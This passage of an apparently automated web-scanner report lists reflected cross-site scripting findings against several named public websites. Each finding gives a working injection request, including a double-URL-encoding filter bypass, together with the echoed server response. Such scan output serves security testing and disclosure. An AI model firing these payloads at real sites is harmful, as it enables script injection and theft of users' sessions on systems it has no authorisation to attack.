Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A66
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1188; path=/
Set-Cookie: PortletId=1199201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=3pnj2rusybze5e45ktwtjc45; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 95510
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65c45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/newsmedia/fastfacts/?984c4"><script>alert(1)</script>9caa5b51498=1&print=true'); ">
...[SNIP]...
4.141. http://www.hoganlovells.com/newsmedia/newspubs [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff387"><script>alert(1)</script>f5129b0d7e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /newsmedia/newspubs?ff387"><script>alert(1)</script>f5129b0d7e4=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:19:44 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1186; path=/
Set-Cookie: PortletId=1197201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=0afkoditkupm0a45bsb3rl55; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 259890
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/newsmedia/newspubs/?ff387"><script>alert(1)</script>f5129b0d7e4=1&print=true'); ">
...[SNIP]...
4.142. http://www.hoganlovells.com/newsmedia/newspubs/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddef3"><script>alert(1)</script>32ec83aedd1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmedia/newspubs/?ddef3"><script>alert(1)</script>32ec83aedd1=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:19:57 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1186; path=/
Set-Cookie: PortletId=1197201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=nqxi0l45ugjikt45htjgkszm; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 259890
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/newsmedia/newspubs/?ddef3"><script>alert(1)</script>32ec83aedd1=1&print=true'); ">
...[SNIP]...
4.143. http://www.hoganlovells.com/newsmedia/newspubs/List.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/List.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6781"><script>alert(1)</script>141a5cc1321 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmedia/newspubs/List.aspx?f6781"><script>alert(1)</script>141a5cc1321=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:19:13 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1186; path=/
Set-Cookie: PortletId=1197201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=gnqers55ubowfiv34xrwdf55; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 166775
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/newsmedia/newspubs/List.aspx?f6781"><script>alert(1)</script>141a5cc1321=1&print=true'); ">
...[SNIP]...
4.144. http://www.hoganlovells.com/newsmedia/timeline/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/timeline/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2644c"><script>alert(1)</script>bedf04dc077 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmedia/timeline/?2644c"><script>alert(1)</script>bedf04dc077=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:19:07 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1189; path=/
Set-Cookie: PortletId=1200201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=fosfrm45vostudiwypgxb155; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 114381
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/newsmedia/timeline/?2644c"><script>alert(1)</script>bedf04dc077=1&print=true'); ">
...[SNIP]...
4.145. http://www.hoganlovells.com/ourpeople/List.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /ourpeople/List.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec2f0"><script>alert(1)</script>2daf70c6706 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ourpeople/List.aspx?ec2f0"><script>alert(1)</script>2daf70c6706=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:23:27 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1075; path=/
Set-Cookie: PortletId=13201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=sbdibi45oqlx1b45piq0vq45; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2627156
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/ourpeople/List.aspx?ec2f0"><script>alert(1)</script>2daf70c6706=1&print=true'); ">
...[SNIP]...
4.146. http://www.hollerclassic.com/smartbrowse/ajax/used.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hollerclassic.com
Path:   /smartbrowse/ajax/used.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c79e4"><script>alert(1)</script>00e92029aec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowsec79e4"><script>alert(1)</script>00e92029aec/ajax/used.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=false&showTrim=false&showBodyStyle=false&showMileage=false&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: www.hollerclassic.com
Proxy-Connection: keep-alive
Referer: http://www.hollerclassic.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=63dda7ab0a0a002f017f2dac183a097c; JSESSIONID=8klanm5n1qr6h; ddcpoolid=CmsPoolP; __utmz=193517236.1303050588.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/36; __utma=193517236.1979268532.1303050588.1303050588.1303050588.1; __utmc=193517236; __utmb=193517236.1.10.1303050588

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 13798
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:30:00 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7072 -->

   <title> | New Audi, Chevrolet, Honda, Hummer, Hyundai, Mazda dealership in Winter Park, FL 32789
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=18a7b'-alert(document.cookie)-'9a5e8f0fc61&amp;20=www.hollerclassic.com&amp;21=/smartbrowsec79e4"><script>alert(1)</script>00e92029aec/ajax/used.htm&amp;50=63dda7ab0a0a002f017f2dac183a097c&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62
...[SNIP]...
4.147. http://www.hollerclassic.com/smartbrowse/ajax/used.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hollerclassic.com
Path:   /smartbrowse/ajax/used.htm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ab29"><script>alert(1)</script>cc275c6ab53 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowse/ajax5ab29"><script>alert(1)</script>cc275c6ab53/used.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=false&showTrim=false&showBodyStyle=false&showMileage=false&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: www.hollerclassic.com
Proxy-Connection: keep-alive
Referer: http://www.hollerclassic.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=63dda7ab0a0a002f017f2dac183a097c; JSESSIONID=8klanm5n1qr6h; ddcpoolid=CmsPoolP; __utmz=193517236.1303050588.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/36; __utma=193517236.1979268532.1303050588.1303050588.1303050588.1; __utmc=193517236; __utmb=193517236.1.10.1303050588

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 13798
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:30:01 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7072 -->

   <title> | New Audi, Chevrolet, Honda, Hummer, Hyundai, Mazda dealership in Winter Park, FL 32789
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=18a7b'-alert(document.cookie)-'9a5e8f0fc61&amp;20=www.hollerclassic.com&amp;21=/smartbrowse/ajax5ab29"><script>alert(1)</script>cc275c6ab53/used.htm&amp;50=63dda7ab0a0a002f017f2dac183a097c&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=10
...[SNIP]...
4.148. http://www.info.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.info.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c4beb'><a>13945db1d18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?c4beb'><a>13945db1d18=1 HTTP/1.1
Host: www.info.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: Z=YOYLQIS74.205.26.218CKMLM; path=/
Date: Sun, 17 Apr 2011 14:19:46 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17819

<html><head>
       <title>Info.com - Search the Web</title>
   <meta name=keywords content="Info,information,Search,Searches,Searching,Searchers,Advanced search,Search Help,Search guide,Search tips,Search t
...[SNIP]...
<img src='http://info.intelli-direct.com/e/t3.dll?280&0&%20&qcat%3DWeb%26itpage%3D?c4beb'><a>13945db1d18=1&iREGQry&iSale&0&0&0&0&0&0&%20&1500&%20&0' height=1 width=1 border=0>
...[SNIP]...
4.149. http://www.info.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.info.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9857d"-alert(1)-"1634c822576 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9857d"-alert(1)-"1634c822576=1 HTTP/1.1
Host: www.info.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: Z=YOYLQIS74.205.26.219CKMLO; path=/
Date: Sun, 17 Apr 2011 14:19:47 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17824

<html><head>
       <title>Info.com - Search the Web</title>
   <meta name=keywords content="Info,information,Search,Searches,Searching,Searchers,Advanced search,Search Help,Search guide,Search tips,Search t
...[SNIP]...
<!--
var pqry="qcat%3DWeb%26itpage%3D?9857d"-alert(1)-"1634c822576=1";var rqry="iREGQry";var sqry="iSale";var dt=window.document,nr=navigator,ina=nr.appName,sr="0&0",px=0,sv=10,je=0; var inav=nr.appVersion,iie=inav.indexOf('MSIE '),intp=(ina.indexOf('Netscape')>
...[SNIP]...
4.150. http://www.info.com/washington%20dc%20law%20firms [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.info.com
Path:   /washington%20dc%20law%20firms

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 436a5%253cscript%253ealert%25281%2529%253c%252fscript%253ed23057a9ce0 was submitted in the REST URL parameter 1. This input was echoed as 436a5<script>alert(1)</script>d23057a9ce0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /washington%20dc%20law%20firms436a5%253cscript%253ealert%25281%2529%253c%252fscript%253ed23057a9ce0 HTTP/1.1
Host: www.info.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: Z=YOYLQIS74.205.26.218CKMLM; path=/
Date: Sun, 17 Apr 2011 14:20:35 GMT
Server: Apache
Set-Cookie: a=newwindow+1+dpcollation_web+1+lang+0+familyfilter+1+bold+1+msRecentSearches+off+autocorrect+0+domain+infocom+ts+1303050035+last_cmp++engineset+int-only; expires=Thu, 16-Apr-2037 21:28:31 GMT; path=/; domain=.info.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40031

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Info.com - washington dc law firms436a5%3cscript%3ealert%281%29%3c%2fscript%3ed23057a9ce0 - www.Info.com</title><l
...[SNIP]...
<a href="http://Info.com/searchw?qkw=washington+dc+law+firms+436a5%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed23057a9ce0&r_cop=spell" style="text-decoration:underline">washington dc law firms 436a5<script>alert(1)</script>d23057a9ce0</a>
...[SNIP]...
4.151. http://www.jonesdaydiversity.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jonesdaydiversity.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d198'-alert(1)-'69c20afbe3b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5d198'-alert(1)-'69c20afbe3b=1 HTTP/1.1
Host: www.jonesdaydiversity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:14:45 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000610
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A38
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1389; path=/
Set-Cookie: PortletId=6605501; path=/
Set-Cookie: SiteId=1383; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=fcj5d3imp2gaac3js0iubt32; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1036&RootPortletID=616&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=FCW; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9869
Set-Cookie: NSC_MC_KpoftEbz_b37b38_IUUQ=ffffffff09d5f63e45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title id="ctl00_htmlTitle">Jones Day Diversity</title>
<link rel="stylesheet"
...[SNIP]...
<![CDATA[
var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/Home.aspx?5d198'-alert(1)-'69c20afbe3b=1';//]]>
...[SNIP]...
4.152. http://www.jumptags.com/add/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jumptags.com
Path:   /add/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bfaa"><script>alert(1)</script>8d9f2554263 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /add/?6bfaa"><script>alert(1)</script>8d9f2554263=1 HTTP/1.1
Host: www.jumptags.com
Accept: */*
Accept-Language: en
